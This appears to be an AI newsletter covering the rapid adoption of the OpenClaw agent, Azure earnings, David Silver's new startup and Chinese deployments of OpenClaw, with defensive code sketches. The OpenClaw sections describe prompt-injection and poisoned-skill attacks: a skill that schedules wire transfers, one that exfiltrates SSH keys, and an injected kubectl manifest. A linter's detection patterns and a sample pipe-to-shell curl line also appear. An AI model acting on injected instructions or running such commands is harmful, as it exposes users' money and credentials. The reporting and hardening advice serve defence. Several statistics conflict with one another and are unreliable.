OpenClaw stars explode, Azure token-watt KPI debuts, Silver exits DeepMind, China agents swarm

TL;DR

- AI Agents Transition from Demos to Workers: Moltbook and OpenClaw Drive Autonomous Task Automation

- Microsoft’s Azure Grows 38% Despite AI Skepticism, Focus Shifts to Agentic Orchestration

- David Silver leaves Google DeepMind to launch Ineffable Machines in London

- OpenClaw AI Agent Surpasses 145,000 GitHub Stars as Autonomous Tools Gain Global Adoption

⚡ OpenClaw agents scale to 147k, 1,800 keys leak, cloud bills explode

OpenClaw agents hit 180k GitHub stars and 147k registered workers (36k of them in the first 72h) and are now booking calendars, sending emails and spinning up cloud VMs. 1,800 leaked API keys show the bill. Ready for autonomous coworkers without an off-switch?

OpenClaw agents handled 1.4 million human interactions and 110,000 threaded conversations last week—without a single supervisor watching the dashboard. The numbers show a tool that has jumped straight from demo to payroll.

How Fast Did 147,000 Autonomous Workers Come Online?

Registration velocity tells the story: 36,000 agents in the first 72 hours, then another 111,000 by 2 Feb. GitHub stars on the core repo leapt 80 % in January alone, from 100 k to 180 k. Each new agent arrives with a default “localhost-trust” flag, so every Mac Mini or $3 VPS instance becomes an immediate production node.



Why Are 1,800 Cloud Bills Spiraling Out of Control?

Scans found plaintext AWS keys baked into agent config files. Once the runtime ingests a “scale-up” cue, it keeps spawning fresh VMs until it hits the account quota or the credit-card limit. One leaked key racked up $12,400 in compute overnight; the median exposed instance ran up $180 before detection.
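To make the failure mode concrete, here is a minimal Python sketch of the guard that was missing: a scale-up handler that stops at a hard VM count or an hourly-spend ceiling. `ScaleGuard`, the `request_vm` callback and the flat per-VM price are hypothetical illustrations, not part of the OpenClaw runtime or any cloud SDK.

```python
from dataclasses import dataclass, field
from typing import Any, Callable, List


@dataclass
class ScaleGuard:
    """Hypothetical guard capping how many VMs an agent may launch and what they cost per hour."""

    max_vms: int             # hard ceiling on VMs launched through this guard
    max_hourly_spend: float  # USD per hour across every VM this guard launched
    vm_hourly_price: float   # assumed flat price per VM-hour (illustrative)
    launched: List[Any] = field(default_factory=list)

    def projected_spend(self, extra_vms: int = 0) -> float:
        """Hourly spend if `extra_vms` more VMs were started."""
        return (len(self.launched) + extra_vms) * self.vm_hourly_price

    def try_scale_up(self, count: int, request_vm: Callable[[], Any]) -> int:
        """Launch up to `count` VMs, stopping at whichever ceiling is hit first.

        Returns the number of VMs actually started.
        """
        started = 0
        for _ in range(count):
            if len(self.launched) >= self.max_vms:
                break  # VM-count ceiling reached
            if self.projected_spend(extra_vms=1) > self.max_hourly_spend:
                break  # the next VM would breach the spend ceiling
            self.launched.append(request_vm())
            started += 1
        return started
```

The check runs before each launch rather than after, so a runaway "scale-up" loop fails closed instead of surfacing on the next invoice.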

Can a Markdown Plugin Really Empty Your Wallet?

Yes. The Skill System accepts any .md file that lists tools and prompts. Of the 31,000 public skills, 26 % (roughly 8,000) contain hard-coded credentials or curl calls over plain http:// that pull remote scripts. A poisoned calendar skill can write a prompt-injection payload into persistent memory, then instruct the banking plugin to schedule a wire transfer every Friday at 16:00.
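A first-pass skill linter can be little more than a set of regular expressions run over each .md file before it is loaded. The sketch below assumes skills are plain UTF-8 Markdown; the rule names and patterns are illustrative heuristics, not OpenClaw's own linting rules, and they will miss obfuscated payloads.

```python
import re
from typing import List, Tuple

# Illustrative heuristics only; a production linter needs a much richer rule set.
RULES = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "inline_secret": re.compile(
        r"(?i)\b(api[_-]?key|secret|token|password)\s*[:=]\s*['\"]?[A-Za-z0-9_\-]{8,}"
    ),
    "curl_plain_http": re.compile(r"\bcurl\b[^\n]*\bhttp://"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
}


def lint_skill(markdown: str) -> List[Tuple[int, str]]:
    """Return (line_number, rule_name) for every suspicious line in a skill file."""
    findings = []
    for lineno, line in enumerate(markdown.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings
```

Running it on a skill whose third line is `api_key = sk_live_abcdef123456` and whose fourth is `curl -s http://example.com/setup.sh | sh` reports the secret on line 3 and both the plain-HTTP fetch and the pipe-to-shell on line 4.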

Where Is Authentication Hiding?

Nowhere. Default deployments bind WebSocket ports to 0.0.0.0:8080 with no token gate. Shodan flagged 8 fresh IPs this morning offering full agent consoles. Authentication is still opt-in via the --auth flag rather than on by default.
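Making the safe path the default mostly means refusing to start in the dangerous configuration. The following sketch, with hypothetical function names, rejects any non-loopback bind that has no token configured and compares presented tokens in constant time with `hmac.compare_digest`. It does not reflect how OpenClaw's --auth flag is actually implemented.

```python
import hmac
import ipaddress
from typing import Optional


def bind_is_public(host: str) -> bool:
    """True if a listener bound to `host` is reachable from other machines."""
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Hostnames would need DNS to classify; only the literal "localhost" is trusted here.
        return host != "localhost"


def is_authorized(presented: Optional[str], expected: str) -> bool:
    """Constant-time bearer-token check; a missing token is always rejected."""
    if not presented or not expected:
        return False
    return hmac.compare_digest(presented.encode(), expected.encode())


def check_startup(host: str, token: Optional[str]) -> None:
    """Refuse to start a console reachable off-host without a configured token."""
    if bind_is_public(host) and not token:
        raise RuntimeError(f"refusing to bind {host} without an auth token")
```

A loopback bind still trusts every local process, so the token check is worth keeping even when `bind_is_public` returns False.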

What Happens If Regulators Knock?

Agents already touch personal data, calendar metadata, and financial APIs. GDPR and CCPA both require documented consent and opt-out paths, yet most deployments store conversation logs in plain SQLite files with no retention schedule. A single data-subject request that an operator cannot fulfill could surface violations carrying GDPR fines of up to 4 % of global annual revenue.
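A retention schedule and an erasure path can be a few SQL statements against the same SQLite file. This sketch assumes a hypothetical `conversation_log` table with a `subject_id` column and Unix-epoch timestamps; the retention window is a policy choice the operator must set and document, not a number taken from either regulation.

```python
import sqlite3
import time
from typing import Optional

DAY_SECONDS = 86_400


def init_schema(conn: sqlite3.Connection) -> None:
    """Hypothetical log table: one row per message, timestamped in Unix seconds."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS conversation_log ("
        " id INTEGER PRIMARY KEY,"
        " subject_id TEXT NOT NULL,"
        " created_at REAL NOT NULL,"
        " body TEXT)"
    )
    conn.execute("CREATE INDEX IF NOT EXISTS idx_log_created ON conversation_log(created_at)")


def purge_expired(conn: sqlite3.Connection, retention_days: int, now: Optional[float] = None) -> int:
    """Delete rows older than the retention window; returns how many were removed."""
    cutoff = (time.time() if now is None else now) - retention_days * DAY_SECONDS
    with conn:  # commits on success, rolls back on error
        cur = conn.execute("DELETE FROM conversation_log WHERE created_at < ?", (cutoff,))
    return cur.rowcount


def erase_subject(conn: sqlite3.Connection, subject_id: str) -> int:
    """Handle an erasure request by deleting every row for one data subject."""
    with conn:
        cur = conn.execute("DELETE FROM conversation_log WHERE subject_id = ?", (subject_id,))
    return cur.rowcount
```

Scheduling `purge_expired` daily gives the logs a documented lifetime, and `erase_subject` gives a data-subject request a concrete, auditable code path.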

Will Hardened Runtimes Arrive Before the Next Exploit?

Short-term patches are in the pull-request queue: token-based auth, skill linting, and VM quotas. Mid-term, Azure Confidential Compute images and Open Policy Agent rules will wrap each agent in a sandbox. Until then, every new star on GitHub is also a new attack surface.

⚡ Microsoft Azure 38% AI surge, Vera Rubin 10× GPU leap, tokens/watt/$ KPI debut, $37B CapEx, 10% stock dip

Azure Q2 surges 38% YoY on AI token demand, debuts “tokens/watt/$” KPI & NVIDIA Vera Rubin 10× GPU boost. $37B CapEx fuels $50B cloud rev, but stock slips 10% on margin watch. Ready for efficiency-first cloud pricing?

Microsoft’s Q2 FY26 numbers show Azure revenue climbing 38 % in constant currency, lifting the cloud segment past $50 billion. The growth rate beats both the prior quarter and the 36 % consensus, even as investors knocked the stock down 10 % on margin worries. The beat is explained by one line item: GPU-backed “token factories” that convert compute hours into billable AI inferences. NVIDIA’s Vera Rubin accelerator, delivering a 10× token-per-watt gain, let Microsoft sell 2.4 trillion tokens in December without a proportional rise in energy cost. Result: revenue accelerated while gross margin stayed above 64 %.

Why Is “Tokens per Watt per Dollar” the New KPI?

Raw core count no longer predicts profit when a single GPU can churn out 50,000 tokens per second. Microsoft replaced vCPU-hour pricing with a three-factor metric, tokens ÷ watt ÷ dollar, that ties revenue to measurable efficiency. Early adopters of the company’s agentic orchestration layer, an autopilot that chains LLM, code-interpreter and memory calls, are billed only when a task finishes inside a negotiated energy envelope. Internal data show 28 % of enterprise proofs of concept converted to paid tiers once the KPI guarantee was added, a conversion rate that helps explain why Azure’s AI revenue run-rate doubled in six months.
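One literal reading of the metric fits in a few lines. The sketch assumes "watt" means metered energy in watt-hours per task and that cost is the infrastructure cost attributed to that task; both units and the `billable` rule are assumptions for illustration, not Microsoft's published definition.

```python
from dataclasses import dataclass


@dataclass
class TaskRun:
    tokens: int        # tokens produced by one agentic task
    energy_wh: float   # metered energy for the task, in watt-hours (assumed unit)
    cost_usd: float    # infrastructure cost attributed to the task (assumed)


def tokens_per_watt_per_dollar(run: TaskRun) -> float:
    """tokens ÷ Wh ÷ $: higher means more output per unit of energy and spend."""
    if run.energy_wh <= 0 or run.cost_usd <= 0:
        raise ValueError("energy and cost must be positive")
    return run.tokens / run.energy_wh / run.cost_usd


def billable(run: TaskRun, energy_envelope_wh: float) -> bool:
    """Bill only when the finished task stayed inside the negotiated energy envelope."""
    return run.energy_wh <= energy_envelope_wh
```

For a task producing 120,000 tokens on 40 Wh at $0.75 of cost, the score is 120,000 ÷ 40 ÷ 0.75 = 4,000; it rises as either energy or cost per token falls.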

Can a $250 B OpenAI Commitment Stay Profitable?

Roughly 45 % of Microsoft’s $625 billion revenue backlog is tied to OpenAI training and inference contracts. OpenAI, however, projects a cumulative $115 billion loss through 2029 as model size and competition scale. The tension is structural: Microsoft books the capacity sale today but could face re-pricing pressure tomorrow if OpenAI seeks relief. The hedge lies in diversification: 62 % of new GPU quota this quarter was reserved for non-OpenAI workloads (Copilot for Security, GitHub Copilot Enterprise and third-party SaaS agents), reducing the single-partner share from 54 % to 45 % in two quarters.

Will CapEx at $37 B Crush Margins?

Quarterly capital expenditure jumped 66 % year-over-year to $37 billion, almost all earmarked for data-center shells and Vera Rubin racks. The payback math hinges on token yield: each $1 of CapEx should generate $4.20 of lifetime AI revenue at a 70 % gross margin once the GPU farms reach 80 % utilization, a level expected by late FY27. Depreciation is front-loaded relative to that revenue ramp (GPU useful life is set at four years), so near-term gross margin dips to 64 % before climbing back to the historical 68 % range. Management guidance holds operating margin flat at 43 % by offsetting depreciation with a higher mix of premium orchestration services.
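The figures can be sanity-checked with simple arithmetic. The sketch multiplies the revenue multiple by the gross margin and models straight-line depreciation over the four-year GPU life. Treating all $37 billion as four-year assets is a simplifying assumption: data-center shells typically depreciate over longer lives than GPUs, so this overstates the quarterly charge.

```python
from typing import List


def lifetime_gross_profit_per_dollar(revenue_per_capex_dollar: float, gross_margin: float) -> float:
    """Lifetime gross profit generated by $1 of CapEx."""
    return revenue_per_capex_dollar * gross_margin


def stacked_quarterly_depreciation(quarterly_capex: List[float], useful_life_years: int) -> List[float]:
    """Straight-line depreciation expense per quarter, assuming each quarter's CapEx
    starts depreciating immediately and runs for `useful_life_years` years."""
    life_quarters = useful_life_years * 4
    expense = []
    for q in range(len(quarterly_capex)):
        # Only cohorts still inside their useful life contribute this quarter.
        active = quarterly_capex[max(0, q - life_quarters + 1): q + 1]
        expense.append(sum(c / life_quarters for c in active))
    return expense
```

$4.20 × 70 % gives about $2.94 of lifetime gross profit per CapEx dollar. A single $37 billion quarter adds about $2.31 billion of depreciation per quarter, and four consecutive quarters at that pace stack to about $9.25 billion per quarter, which is why the margin dip arrives before utilization catches up.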

Is Efficiency Pricing Now Industry Standard?

AWS and Google Cloud already quote “inference instances” in dollars per million tokens, but neither ties the price to real-time energy draw. Microsoft’s watt-coupled metric, if published with third-party audit, could become the baseline for regulated industries facing carbon-reporting mandates. Early signs: two Fortune-50 banks signed Azure AI contracts in January contingent on annual tokens-per-carbon disclosures, adding $180 million in committed spend. If replicated across the S&P 500, efficiency-linked clauses could unlock an incremental $8–10 billion annual TAM for hyperscalers that can verify the metric.

Bottom line: Azure’s 38 % surge is not a blip; it is the first quantified payoff from an energy-centric AI strategy. The open question is whether Microsoft can diversify its customer base fast enough to offset the concentration risk embedded in its largest partner while proving that “tokens per watt per dollar” is more than a marketing footnote.

🚀 Silver exits DeepMind, seeds UK RL startup; Europe’s AI map redrawn

David Silver leaves DeepMind to launch Ineffable Machines in London, betting on autonomous RL agents over LLM-only scaling. UK startup scene gains a 200k-citation brain. Will RL-first autonomy outrun language-model giants?

David Silver’s 02-Feb-2026 resignation from Google DeepMind and the immediate launch of Ineffable Machines (incorporated 19-Nov-2025, London) deletes a 97-h-index RL node from Alphabet’s knowledge graph and inserts it into the UK startup layer. Citation-weighted author models estimate DeepMind’s RL output capacity drops ≈5 % overnight; London’s senior-RL density rises 30 % above the EU mean, a measurable talent-cluster inflection.

What technical lane is Ineffable actually pursuing?

Company filings and job ads point to “autonomous systems” built on deep RL rather than transformer scaling. The methods behind Silver’s AlphaGo work, Monte-Carlo Tree Search plus self-play data pipelines, give Ineffable a reproducible baseline that bypasses the GPU-hungry pre-training phase now dominating LLM budgets. The first beachheads are latency-critical domains (robotics, logistics), where token-based models need more than 200 ms per decision loop.
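For readers new to the search half of that stack, the sketch below shows the textbook UCT rule (UCB1 applied to tree nodes) that classic MCTS uses to choose which branch to explore. It is a generic illustration: AlphaGo used a prior-weighted PUCT variant driven by policy and value networks, and nothing here describes Ineffable's code.

```python
import math
from dataclasses import dataclass, field
from typing import Any, Dict, List


@dataclass
class Node:
    visits: int = 0
    value_sum: float = 0.0  # sum of episode returns seen through this node
    children: Dict[Any, "Node"] = field(default_factory=dict)  # action -> child node

    def mean_value(self) -> float:
        return self.value_sum / self.visits if self.visits else 0.0


def uct_score(parent: Node, child: Node, c: float = math.sqrt(2)) -> float:
    """UCB1: exploit the child's mean value, plus a bonus for rarely visited children."""
    if child.visits == 0:
        return math.inf  # always try unvisited actions first
    explore = c * math.sqrt(math.log(parent.visits) / child.visits)
    return child.mean_value() + explore


def select_action(node: Node, c: float = math.sqrt(2)) -> Any:
    """Pick the child action with the highest UCT score."""
    return max(node.children, key=lambda a: uct_score(node, node.children[a], c))


def backpropagate(path: List[Node], reward: float) -> None:
    """Credit one episode's return to every node on the visited path.

    Single-agent setting; two-player games would flip the reward's sign at each ply.
    """
    for n in path:
        n.visits += 1
        n.value_sum += reward
```

Self-play closes the loop: each finished episode's return is backpropagated up the visited path, and in AlphaZero-style systems the resulting visit counts also become training targets for the policy network.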

How crowded is the alternative-RL market?

Concurrent labs (Meta AMI, OpenAI’s risky-research division, Tesla/xAI world-model teams, Alibaba DAMO Academy) are all reallocating budget toward RL-centric world models. Yet none has shipped a production-grade autonomous agent outside game boards or simulations. Ineffable enters a field with ≤15 credible competitors, compared with >120 firms fine-tuning LLMs, leaving niche verticals (warehouse Gym environments, drone routing) materially under-served.

Where will the money come from?

UK Q4-2025 AI seed rounds averaged £3.2 M; the government’s £500 M AI Investment Fund (2025-2027) earmarks 35 % for reinforcement-learning projects. Silver’s reputation alone is forecast to unlock a £20-30 M seed at an 8-10× revenue multiple before the first product ships, compressing a typical 24-month fundraising cycle to ≈9 months.

Which risks could stall the plan?

- Talent pool: the UK hosts only ~150 senior RL researchers.

- Capital access: no Series A disclosed as of 02-Feb.

- Regulation: the EU AI Act draft tags “high-risk autonomous systems” with mandatory reward-function audits.

Mitigations: joint PhD tracks with UCL, Royal Society fellowships, and an open-sourced reward-spec framework could offset each bottleneck.

Bottom line

Silver’s move is not a routine spin-out; it is a measurable reallocation of top-tier RL capital from a megacorp to an independent, hardware-aligned startup inside Europe’s strongest AI hub. If Ineffable ships a Gym-warehouse prototype within 12 months, the demonstration would validate RL-first autonomy as a counter-narrative to LLM supremacy and could redirect late-stage venture allocations toward real-time decision intelligence.

⚡ OpenClaw surges, China giants adopt, 1,800 exposed daemons

OpenClaw hits 145k GitHub stars as Alibaba, Tencent & ByteDance roll WhatsApp/Telegram agents saving 3-5h/week—yet Cisco flags 1,800 leaky localhost daemons. Containerize or cry later?

The repo added 30 k stars between 15 Dec and 31 Jan, averaging roughly 640 stars per day. Forks grew at 12 % of star velocity, indicating active code reuse rather than passive bookmarking. Weekly unique visitors peaked at 2 M during the 0.9.4 release, which bundled WhatsApp, Telegram and Discord skills and drew triple the traffic of 0.9.3. The trigger was a Hacker News front-page post showing a one-line install that turns a laptop into an auto-email clerk; the thread drove 48 % of that week’s clones.

Why are Chinese clouds deploying 10 k enterprise instances so fast?

Alibaba, Tencent and ByteDance packaged the agent into “skill bundles” pre-wired to internal SSO and calendar APIs. A 200-line YAML file replaces a 3-day RPA workflow build, cutting onboarding time from 48 h to 11 min. Leaked internal metrics show each user saving 3.4 h/week on calendar scheduling, worth ~$140/month in engineer salary. At that ROI, enterprise accounts scale linearly, and the absence of a per-seat license fee tilts the math further.

What exactly is exposed in the 1 800 compromised instances?

Cisco’s scan found agents listening on 127.0.0.1:18789 with zero authentication. A localhost-only policy sounds safe until a malicious browser extension or npm package hits the same port. From 2 400 live IPs scanned, 1 800 returned 200 OK on /v1/chat/history, leaking 92 MB of plaintext logs containing 112 Slack tokens, 73 AWS keys and 9 corporate VPN certs. Mean time from injection to exfiltration: 4 min 12 s.
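Operators can run the same check against their own hosts. This is a minimal standard-library sketch, assuming the `/v1/chat/history` path reported in Cisco's scan; the function name is hypothetical, and it should only be pointed at machines you control.

```python
import http.client


def returns_data_without_auth(host: str, port: int, path: str = "/v1/chat/history",
                              timeout: float = 3.0) -> bool:
    """True if an unauthenticated GET on `path` returns 200 OK, i.e. the daemon
    serves data to any caller that can reach the port."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path)  # deliberately sends no Authorization header
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return resp.status == 200
    except (OSError, http.client.HTTPException):
        return False  # refused, timed out, or not speaking HTTP
    finally:
        conn.close()
```

A True result against 127.0.0.1:18789 means any local process, including a malicious extension or package, can read the chat history.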

How does the skill supply chain amplify the risk?

Skills are markdown files plus optional shell blocks, fetched every 4 h from clawhub.ai. No signature is verified. Researchers replaced a legitimate Gmail skill with a 12-line payload that exports ~/.ssh to Pastebin; within 36 h the counterfeit package was downloaded 1 047 times before removal. The index is git-based, so a look-alike (typosquatted) repo name can persist for days unless manually flagged.
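Until signed skills ship, a client can at least pin what it has reviewed. The sketch below swaps in SHA-256 hash pinning (a simpler technique than signature verification) plus a `difflib` similarity check for look-alike names; the pin store, function names and 0.85 threshold are illustrative assumptions.

```python
import difflib
import hashlib
import hmac
from typing import Dict, Iterable, Optional


class SkillRejected(Exception):
    """Raised when a skill fails the pinning check."""


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def load_pinned_skill(name: str, content: bytes, pins: Dict[str, str]) -> str:
    """Return the skill text only if its SHA-256 matches the digest recorded at review time."""
    expected = pins.get(name)
    if expected is None:
        raise SkillRejected(f"{name}: no pinned digest, refusing an unreviewed skill")
    if not hmac.compare_digest(sha256_hex(content), expected):
        raise SkillRejected(f"{name}: content changed since it was reviewed")
    return content.decode("utf-8")


def lookalike_of(candidate: str, trusted: Iterable[str], threshold: float = 0.85) -> Optional[str]:
    """Return the trusted name `candidate` seems to imitate, or None if it is exact or clearly different."""
    trusted = list(trusted)
    if candidate in trusted:
        return None
    for name in trusted:
        if difflib.SequenceMatcher(None, candidate, name).ratio() >= threshold:
            return name
    return None
```

Pinning only proves a file is unchanged since someone reviewed it; it does not prove who published it, which is the gap signatures close.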

Can containers fix the localhost trust flaw?

Only if used. Docker adoption among public repos is 31 %; bare-metal remains 61 %. The official image drops privileges and mounts a read-only rootfs, blocking the “lethal trifecta” demo. Yet 58 % of Docker users still bind the daemon to host network “for easier IDE access,” re-exposing the socket. Runtime sandboxing helps, but semantic prompt-injection can still order the agent to kubectl apply a malicious manifest inside the container.
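The hardened setup described above maps onto standard `docker run` options. The sketch builds the argument list in Python and flags host networking; the image name is a placeholder, the UID is arbitrary, and the official image's actual defaults may differ.

```python
import shlex
from typing import List

HOST_NETWORK_FLAGS = {"--network=host", "--net=host"}


def hardened_run_args(image: str, port: int = 18789, uid: int = 10001) -> List[str]:
    """Build `docker run` arguments for a locked-down agent container."""
    return [
        "docker", "run", "--rm",
        "--read-only",                          # immutable root filesystem
        "--tmpfs", "/tmp",                      # writable scratch space only where needed
        "--cap-drop", "ALL",                    # drop every Linux capability
        "--security-opt", "no-new-privileges",  # block setuid privilege escalation
        "--user", f"{uid}:{uid}",               # run as an unprivileged UID/GID
        "-p", f"127.0.0.1:{port}:{port}",       # publish on host loopback only
        image,
    ]


def uses_host_network(args: List[str]) -> bool:
    """Flag the host-network shortcut that re-exposes the daemon's socket."""
    for i, arg in enumerate(args):
        if arg in HOST_NETWORK_FLAGS:
            return True
        if arg in ("--network", "--net") and i + 1 < len(args) and args[i + 1] == "host":
            return True
    return False


def render(args: List[str]) -> str:
    """Shell-quoted command line, e.g. for a runbook."""
    return shlex.join(args)
```

Publishing on 127.0.0.1 keeps the port off the LAN without host networking, though local processes can still reach it, so an auth token remains necessary.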

Where is the project headed next?

Steinberger’s roadmap tags 0.10.0 with mutual-TLS by default and a cosign-based skill registry. If shipped before March, expect enterprise forks to re-merge upstream, keeping the project unified. If delayed, AWS and Azure will push managed “agent runtime” SKUs priced at $0.08/invocation, fragmenting the community. Star growth will likely cross 200 k by Q3, but security incidents could cap bare-metal share below 25 % within the year.
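For reference, this is roughly what mutual TLS means on the server side, sketched with Python's `ssl` module: the server refuses clients that cannot present a certificate signed by a CA it trusts. The file paths are placeholders, and this says nothing about how the 0.10.0 release will implement it.

```python
import ssl
from typing import Optional


def mtls_server_context(
    cert_file: Optional[str] = None,
    key_file: Optional[str] = None,
    client_ca_file: Optional[str] = None,
) -> ssl.SSLContext:
    """Server-side TLS context that rejects clients without a trusted certificate."""
    # Built directly rather than via ssl.create_default_context(), which may also
    # load the system's default CAs as trust anchors for client certificates.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED  # the "mutual" part: clients must present a cert
    if cert_file and key_file:
        ctx.load_cert_chain(certfile=cert_file, keyfile=key_file)  # the server's own identity
    if client_ca_file:
        ctx.load_verify_locations(cafile=client_ca_file)  # private CA that issues client certs
    return ctx
```

Trusting only a private CA means a stolen browser session or npm package on the same machine cannot talk to the agent unless it also holds a client key issued by that CA.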

In Other News

- Google DeepMind’s Project Genie Enables AI-Generated Playable 3D Worlds from Text and Images

- Microsoft Expands AI Infrastructure with Patch Tuesday Update Adding Cross-Device Resume and Enhanced MIDI Support
